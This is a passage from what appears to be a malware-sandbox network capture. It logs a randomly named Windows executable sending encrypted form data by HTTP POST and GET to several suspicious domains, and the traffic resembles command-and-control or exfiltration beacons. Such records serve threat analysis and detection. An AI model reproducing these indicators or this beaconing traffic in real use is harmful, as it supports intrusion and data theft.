                                                          Origin: http://www.ninesquare.games
                                                          Referer: http://www.ninesquare.games/4oy8/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 54 4c 4f 68 41 43 33 45 6a 4a 4e 50 44 42 4b 66 43 49 53 39 50 41 73 34 54 42 53 61 55 76 61 53 73 42 54 56 47 61 4b 61 2f 31 62 77 39 70 4b 6a 71 48 7a 64 38 4a 58 61 6a 50 53 63 45 77 4f 67 2b 35 37 65 2b 4d 67 48 35 78 64 75 38 55 65 79 64 75 6b 72 6e 59 57 79 65 72 4f 48 59 61 58 4f 37 38 6b 39 58 63 58 42 63 66 75 65 4b 70 6e 52 2f 44 78 72 44 51 51 45 4f 53 54 68 6c 38 64 69 65 79 55 62 36 71 37 39 49 41 41 73 58 2f 75 51 51 77 7a 33 51 31 66 58 76 38 79 4a 4a 7a 50 2b 45 71 50 31 71 51 38 4a 75 4f 4b 38 71 54 77 4c 52 6e 67 2f 31 79 38 42 37 76 41 75 67 75 56 6e 69 41 61 56 4d 6a 45 58 54 4c 30 30 73 67 53 56 2f 70 65 47 39 70 6f 3d
                                                          Data Ascii: H0kxIVc=TLOhAC3EjJNPDBKfCIS9PAs4TBSaUvaSsBTVGaKa/1bw9pKjqHzd8JXajPScEwOg+57e+MgH5xdu8UeydukrnYWyerOHYaXO78k9XcXBcfueKpnR/DxrDQQEOSThl8dieyUb6q79IAAsX/uQQwz3Q1fXv8yJJzP+EqP1qQ8JuOK8qTwLRng/1y8B7vAuguVniAaVMjEXTL00sgSV/peG9po=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49884 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:13.548871040 CET | 10829 | OUT | POST /4oy8/ HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.ninesquare.games
                                                          Referer: http://www.ninesquare.games/4oy8/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 54 4c 4f 68 41 43 33 45 6a 4a 4e 50 44 42 4b 66 43 49 53 39 50 41 73 34 54 42 53 61 55 76 61 53 73 42 54 56 47 61 4b 61 2f 32 37 77 36 59 71 6a 6f 67 6e 64 39 4a 58 61 70 76 53 66 45 77 4f 35 2b 35 69 58 2b 4d 63 35 35 7a 56 75 6d 32 57 79 4a 4d 4d 72 75 59 57 79 54 4c 4f 45 41 36 58 62 37 2f 63 35 58 63 6e 42 63 66 75 65 4b 6f 58 52 34 58 74 72 42 51 51 62 4c 53 54 74 68 38 63 46 65 79 4d 4c 36 71 2f 74 49 52 38 73 5a 2f 2b 51 53 47 48 33 4d 6c 66 76 68 63 7a 4f 4a 79 7a 68 45 71 54 44 71 54 67 6a 75 4e 57 38 76 43 55 55 49 56 73 66 75 67 38 6c 6e 50 49 32 76 5a 6c 4c 6e 7a 4f 75 4b 78 6f 41 48 49 6b 73 6b 41 72 6e 36 59 53 56 69 50 49 61 37 64 4e 51 43 6e 4d 70 6d 30 6a 70 6d 4e 54 70 41 61 4c 78 2b 67 68 71 39 49 4b 6b 62 35 54 48 70 4b 2b 35 45 42 71 46 48 75 63 37 56 33 38 43 62 65 36 50 2b 52 38 61 47 6d 74 75 35 45 30 48 4b 57 77 6d 4e 69 31 74 2f 75 30 57 59 39 6c 4f 53 68 68 6f 6c 6c 31 65 6e 76 55 33 34 61 57 41 30 6b 6a 73 70 39 54 76 70 42 44 4c 67 79 39 6d 69 33 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49900 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:16.095500946 CET | 451 | OUT | GET /4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Nov 5, 2024 15:43:31.944534063 CET | 396 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:43:31 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 30 6b 78 49 56 63 3d 65 4a 6d 42 44 31 33 6b 36 34 4a 48 46 78 53 57 4f 59 4f 37 62 53 51 4e 58 55 76 72 61 39 43 63 70 53 6e 76 4d 5a 79 76 38 47 58 67 6a 59 53 37 69 47 4f 4a 34 72 33 71 6c 4f 4c 4d 48 77 6d 34 37 62 37 55 72 74 77 75 2b 55 64 38 6c 6b 6d 4d 59 4a 4a 4c 77 37 61 31 4e 2b 6e 70 53 72 6e 77 2b 38 4e 4c 51 4a 6e 73 55 75 47 4f 4e 71 47 78 69 32 42 62 4c 54 34 3d 26 4f 74 3d 4a 30 55 50 34 48 73 68 63 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50016 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:36.988797903 CET | 709 | OUT | POST /bawd/ HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.s9gzg9.vip
                                                          Referer: http://www.s9gzg9.vip/bawd/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6a 37 39 49 77 4d 42 65 6f 59 47 6a 39 6f 79 6d 57 6c 35 64 39 48 53 41 71 65 5a 63 62 68 76 62 61 58 65 42 68 6b 44 31 59 64 56 2f 56 6f 46 5a 72 67 78 36 6c 35 45 31 66 63 38 7a 44 74 45 6b 73 2f 78 54 74 44 57 54 75 7a 5a 31 2f 4e 57 6b 73 6d 4d 6e 4b 50 4b 75 62 68 2b 66 6e 38 45 75 50 38 76 34 43 61 31 73 66 66 45 46 68 56 6f 76 32 42 36 6c 4d 66 43 64 68 4d 64 4a 48 67 4f 67 61 56 5a 55 5a 74 64 38 59 51 61 4d 38 56 4f 64 48 58 33 33 6a 48 46 7a 6c 6e 69 66 30 53 51 32 57 43 48 58 63 61 4d 62 47 79 35 7a 62 76 45 31 6d 78 6c 32 43 50 74 2b 62 79 70 37 47 7a 6c 55 30 41 3d 3d
                                                          Data Ascii: H0kxIVc=j79IwMBeoYGj9oymWl5d9HSAqeZcbhvbaXeBhkD1YdV/VoFZrgx6l5E1fc8zDtEks/xTtDWTuzZ1/NWksmMnKPKubh+fn8EuP8v4Ca1sffEFhVov2B6lMfCdhMdJHgOgaVZUZtd8YQaM8VOdHX33jHFzlnif0SQ2WCHXcaMbGy5zbvE1mxl2CPt+byp7GzlU0A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50017 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:39.537712097 CET | 729 | OUT | POST /bawd/ HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.s9gzg9.vip
                                                          Referer: http://www.s9gzg9.vip/bawd/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6a 37 39 49 77 4d 42 65 6f 59 47 6a 38 49 43 6d 51 30 35 64 71 33 53 48 76 65 5a 63 51 42 76 58 61 58 69 42 68 6b 71 77 59 4c 4e 2f 55 4b 64 5a 71 68 78 36 6f 5a 45 31 51 38 38 71 62 4e 45 52 73 2f 39 74 74 44 36 54 75 33 78 31 2f 4d 6d 6b 73 56 55 67 62 50 4b 37 43 52 2b 64 71 63 45 75 50 38 76 34 43 61 51 4a 66 66 4d 46 68 6b 59 76 33 67 36 36 50 66 44 76 33 38 64 4a 44 67 4f 6b 61 56 5a 6d 5a 75 5a 47 59 53 53 4d 38 51 4b 64 47 47 33 6f 71 48 46 78 36 58 69 4b 6c 44 73 2b 58 48 4b 39 53 63 51 48 46 77 39 31 61 70 56 76 33 41 45 68 51 50 4a 4e 47 31 67 50 4c 77 59 64 76 46 4c 33 73 46 75 35 51 62 64 37 6b 61 31 50 32 4b 54 59 58 62 45 3d
                                                          Data Ascii: H0kxIVc=j79IwMBeoYGj8ICmQ05dq3SHveZcQBvXaXiBhkqwYLN/UKdZqhx6oZE1Q88qbNERs/9ttD6Tu3x1/MmksVUgbPK7CR+dqcEuP8v4CaQJffMFhkYv3g66PfDv38dJDgOkaVZmZuZGYSSM8QKdGG3oqHFx6XiKlDs+XHK9ScQHFw91apVv3AEhQPJNG1gPLwYdvFL3sFu5Qbd7ka1P2KTYXbE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50018 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:43:42.081111908 CET | 10811 | OUT | POST /bawd/ HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.s9gzg9.vip
                                                          Referer: http://www.s9gzg9.vip/bawd/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6a 37 39 49 77 4d 42 65 6f 59 47 6a 38 49 43 6d 51 30 35 64 71 33 53 48 76 65 5a 63 51 42 76 58 61 58 69 42 68 6b 71 77 59 4c 31 2f 55 37 39 5a 71 43 5a 36 6e 35 45 31 4f 73 38 33 62 4e 45 4d 73 2f 31 78 74 44 47 6c 75 78 31 31 77 4b 53 6b 71 67 34 67 43 66 4b 37 66 68 2b 63 6e 38 45 33 50 38 2f 38 43 61 41 4a 66 66 4d 46 68 6e 77 76 79 42 36 36 41 2f 43 64 68 4d 64 2f 48 67 50 44 61 55 77 52 5a 74 30 35 59 68 71 4d 39 77 36 64 4c 51 4c 6f 32 58 46 2f 35 58 6a 50 6c 44 68 67 58 48 2b 62 53 63 4d 39 46 79 68 31 62 66 67 37 6f 41 77 34 4c 2f 46 71 47 6c 6f 4e 49 54 45 52 6e 30 62 51 36 57 36 41 48 5a 30 56 67 61 31 42 6c 61 7a 70 49 66 68 65 53 6c 6e 72 54 51 7a 55 31 42 41 74 50 58 35 58 51 47 77 33 66 54 64 67 4c 44 4b 6c 56 4f 48 78 34 59 50 49 4d 57 62 44 61 51 5a 67 63 30 50 51 6b 51 48 33 4a 6b 73 74 2b 4d 4e 52 59 5a 59 74 72 32 6c 2f 58 44 39 73 6d 48 74 71 41 4b 38 35 7a 70 4f 39 58 38 6f 43 46 36 71 33 54 5a 38 55 51 7a 4b 54 6d 44 74 47 6c 41 4d 62 49 6a 51 55 35 77 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=j79IwMBeoYGj8ICmQ05dq3SHveZcQBvXaXiBhkqwYL1/U79ZqCZ6n5E1Os83bNEMs/1xtDGlux11wKSkqg4gCfK7fh+cn8E3P8/8CaAJffMFhnwvyB66A/CdhMd/HgPDaUwRZt05YhqM9w6dLQLo2XF/5XjPlDhgXH+bScM9Fyh1bfg7oAw4L/FqGloNITERn0bQ6W6AHZ0Vga1BlazpIfheSlnrTQzU1BAtPX5XQGw3fTdgLDKlVOHx4YPIMWbDaQZgc0PQkQH3Jkst+MNRYZYtr2l/XD9smHtqAK85zpO9X8oCF6q3TZ8UQzKTmDtGlAMbIjQU5wUcQxhid80K+Vwtb8Dqv0lHPkK2S1G8dWFU3U904T/pJ32AnhE0RSmiGLSQJ88HWHvc6osLXDK5PBEqBe60rLp88303h25pOofsfpYiKkF57QuJQaorgj+C9tooZRgh463/cnYwp5X7KQ9EFs2jeLvVsQb9ATkSWj3j9JzcvxZPuyHbT4VUmDtSLhPjhN/Za+ur3GATt6VNU4QZlcVPx9kEysqI7F1VawDD2h8EeiUpWfZ/BZPTglT389fn+s7YcBkeuQwaQnAG/3yhm9Z9a29+MeFrYMTbjFr2jqHpoi6SgD8cVPJHsCeYW5bBpWlqbfXIZkUWcCg8kYMRTSm+DNnpyV0PcTRyU8DrgKSBGVS9RJ2TCOSZPu2qb2b17aH6okyeXIdUhby9cUZ+Dc+QYiQqYwSiHXwzeqll7i5RqnLrYPiooeQhy0Ywlj6au6JjS2AH2KF+UODs82ChK+op6ULRdDEFscwC/s0rBMVh6RDLLe3Bat/OkbDXvrZCTxApeFhhe9SnJa3ugSeXQ95IerqAbLx38cGG1JD4g0o9Jn1NWKcqQVjWta9uZpkp5uUbUQfvSnwtmg9qWmKfSLYgFwfEAZZDo6aYYLLP6SxkwJmTd82YzhH5WJOdqMoC0LFtqyhkVFnHd6XyvbzAa0HOumEa76xszHba8lID [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.4 | 50019 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:43:44.625415087 CET | 445 | OUT | GET /bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw= HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:43:45.253613949 CET | 396 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:43:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 74 3d 4a 30 55 50 34 48 73 68 63 26 48 30 6b 78 49 56 63 3d 75 35 56 6f 7a 38 39 75 76 73 54 54 32 72 61 35 4a 47 52 64 6f 32 43 6f 6b 74 55 6b 59 7a 44 35 54 32 66 6b 6b 30 54 78 47 62 64 68 4f 62 4a 67 6a 43 31 64 67 4b 46 74 59 73 73 62 65 2b 73 4b 6b 4e 35 79 70 69 57 2b 68 6e 74 76 6f 66 2b 62 33 77 6f 55 5a 74 72 6d 43 7a 79 70 6c 4e 38 77 4a 66 61 69 57 61 49 66 5a 50 67 4b 6c 33 59 56 6a 69 43 76 4f 75 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw="}</script></head></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.4 | 50020 | 161.97.142.144 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:43:50.337434053 CET | 718 | OUT | POST /l9k5/ HTTP/1.1
                                                          Host: www.030002832.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.030002832.xyz
                                                          Referer: http://www.030002832.xyz/l9k5/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4b 35 30 77 6c 35 42 50 64 35 4b 36 4a 41 4d 49 62 47 4f 42 69 63 6e 71 79 79 56 4e 68 77 6b 44 67 2b 50 51 54 67 65 45 59 62 49 4b 4e 56 70 55 35 68 70 78 37 68 4a 4f 34 36 4f 44 45 53 67 37 49 4b 58 35 74 6b 2b 72 70 32 77 31 6c 45 70 56 4b 36 6a 38 35 55 38 78 52 68 6b 2f 78 70 4b 67 57 6c 77 64 6a 69 37 78 2b 6b 74 66 62 67 63 42 61 39 43 72 6b 48 2f 4f 32 7a 48 78 6f 37 73 56 6c 64 59 41 36 79 4f 2b 56 2f 45 67 4b 65 76 48 47 37 6a 62 74 41 67 68 6c 44 68 39 6c 6e 6e 56 6f 57 6e 56 42 53 62 78 64 7a 69 2f 7a 52 59 51 78 49 4e 7a 47 46 6d 72 2b 79 73 4f 64 4e 58 44 6f 67 3d 3d
                                                          Data Ascii: H0kxIVc=K50wl5BPd5K6JAMIbGOBicnqyyVNhwkDg+PQTgeEYbIKNVpU5hpx7hJO46ODESg7IKX5tk+rp2w1lEpVK6j85U8xRhk/xpKgWlwdji7x+ktfbgcBa9CrkH/O2zHxo7sVldYA6yO+V/EgKevHG7jbtAghlDh9lnnVoWnVBSbxdzi/zRYQxINzGFmr+ysOdNXDog==
                                                          Nov 5, 2024 15:43:51.189727068 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:51 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: W/"66cce1df-b96"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                          Nov 5, 2024 15:43:51.189743042 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.4 | 50021 | 161.97.142.144 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:43:52.877991915 CET | 738 | OUT | POST /l9k5/ HTTP/1.1
                                                          Host: www.030002832.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.030002832.xyz
                                                          Referer: http://www.030002832.xyz/l9k5/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4b 35 30 77 6c 35 42 50 64 35 4b 36 50 67 38 49 59 68 53 42 31 73 6e 70 2b 53 56 4e 34 41 6b 48 67 2f 7a 51 54 6b 6d 55 62 75 59 4b 4f 77 4e 55 36 6a 42 78 34 68 4a 4f 79 61 4f 38 62 43 67 4b 49 4b 62 48 74 68 47 72 70 32 6b 31 6c 42 56 56 4b 49 4c 2f 37 45 38 33 64 42 6b 39 70 4a 4b 67 57 6c 77 64 6a 69 2f 62 2b 67 42 66 59 54 55 42 61 5a 32 6f 74 6e 2f 4e 6d 6a 48 78 2b 4c 73 72 6c 64 59 2b 36 7a 53 55 56 39 38 67 4b 63 33 48 43 36 6a 59 6e 41 67 6e 36 54 67 50 72 48 71 64 78 6c 57 4a 42 67 54 41 65 54 6d 42 2f 33 4a 4b 67 35 73 6b 55 46 43 59 6a 31 6c 36 51 4f 71 4b 7a 6f 44 31 70 4e 58 2b 43 56 45 51 66 56 4a 63 55 65 4c 62 42 6e 6f 3d
                                                          Data Ascii: H0kxIVc=K50wl5BPd5K6Pg8IYhSB1snp+SVN4AkHg/zQTkmUbuYKOwNU6jBx4hJOyaO8bCgKIKbHthGrp2k1lBVVKIL/7E83dBk9pJKgWlwdji/b+gBfYTUBaZ2otn/NmjHx+LsrldY+6zSUV98gKc3HC6jYnAgn6TgPrHqdxlWJBgTAeTmB/3JKg5skUFCYj1l6QOqKzoD1pNX+CVEQfVJcUeLbBno=
                                                          Nov 5, 2024 15:43:53.720088005 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:53 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: W/"66cce1df-b96"
                                                          Content-Encoding: gzip
